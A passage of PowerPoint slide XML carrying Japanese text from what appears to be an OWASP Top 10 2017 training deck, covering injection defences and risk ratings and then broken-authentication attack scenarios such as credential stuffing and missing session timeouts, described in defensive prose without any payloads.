                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を利用して悪意のあるデータを実行することによって、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>インジェクションを発生させることができる。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ポジティブな、言い換えると「ホワイトリスト」によるサーバサイドの入力検証を用いる。特殊文字を必要とする多くのアプリケーション、たとえばモバイルアプリケーション用のテキストエリアや</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>などにおいては完全な防御方法とはならない。</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上記の対応が困難な動的クエリでは、そのインタープリタ固有のエスケープ構文を使用して特殊文字をエスケープする。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注意：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>テーブル名やカラム名などの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ストラクチャに対してはエスケープができない。そのため、ユーザ指定のストラクチャ名は危険である。これはレポート作成ソフトウェアに存在する一般的な問題である。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>クエリ内で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LIMIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>句やその他の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>制御を使用することで、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>インジェクション攻撃が発生した場合のレコードの大量漏洩を防ぐ。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>インジェクション</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1299230099"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836272"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472">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r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>　</a:t>
                      </a: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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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050" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>検出のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ほとんどのどんなデータソースもインジェクションの経路となりえます。環境変数、パラメータ、外部及び内部の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>サービス、そしてあらゆる種類のユーザというように。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId23"/>
                        </a:rPr>
                        <a:t>インジェクション欠陥</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>は、攻撃者が悪意を持ったデータをインタープリタに送ることができる場合に発生します。</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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>インジェクション欠陥は、特にレガシーコードでは、とても一般的です。インジェクション脆弱性は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>LDAP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XPath</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>、あるいは</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NoSQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>クエリ、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>コマンド、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>パーサー、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SMTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ヘッダー、式言語、および</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ORM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>クエリでよく見られます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                        <a:latin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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>インジェクション欠陥は、コードを調べると簡単に発見できます。スキャナやファジングは、攻撃者がインジェクション欠陥を見つけるのに役立ちます。</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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>インジェクションは、データの損失、破壊、権限ない者への情報漏洩、アカウンタビリティの喪失、またはアクセス拒否につながる可能性があります。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP"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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>インジェクションは、ホストの完全な乗っ取りにつながることがあります。ビジネスへの影響は、アプリケーションとデータの重要性に依存します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">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攻撃シナリオの例</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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>アカウントリスト攻撃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>よく知られたパスワードのリスト</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を用いた攻撃は、広く知られた攻撃手法です。アプリケーションに自動化された攻撃やアカウントリスト攻撃の対策が実装されていないなら、そのアプリケーションは「強力なパスワード検証ツール」として認証情報の有効かどうかを調べるのに悪用されかねません。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ほとんどの認証に関連する攻撃は、パスワードを唯一の認証要素として使い続けてきたために発生しています。かつてベストプラクティスとされてきたパスワードの定期変更や複雑性の要求は、ユーザーに弱いパスワードを繰り返し使うよう促すとの見方があります。そこで、あらゆる組織が</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>NIST 800-63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>に従ってこのようなプラクティスをやめ、多要素認証を使うことが推奨されています。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アプリケーションにセッションタイムアウトが適切に実装されていません。ユーザが公共の場のコンピュータでそのアプリケーションにアクセスします。そのユーザは、アプリケーションからログアウトする代わりに単純にブラウザでそのタブを閉じて、その場を立ち去ります。一時間後、攻撃者が同じコンピュータでブラウザを起動すると、まだそのユーザでログインしたままになっています。</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脆弱性発見のポイント</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>認証に関連した攻撃を防ぐためには、ユーザ認証、セッション管理の設計・実装を確認することが重要です。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>アプリケーションが下記の条件を満たす場合、認証の設計・実装に問題があるかもしれません</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
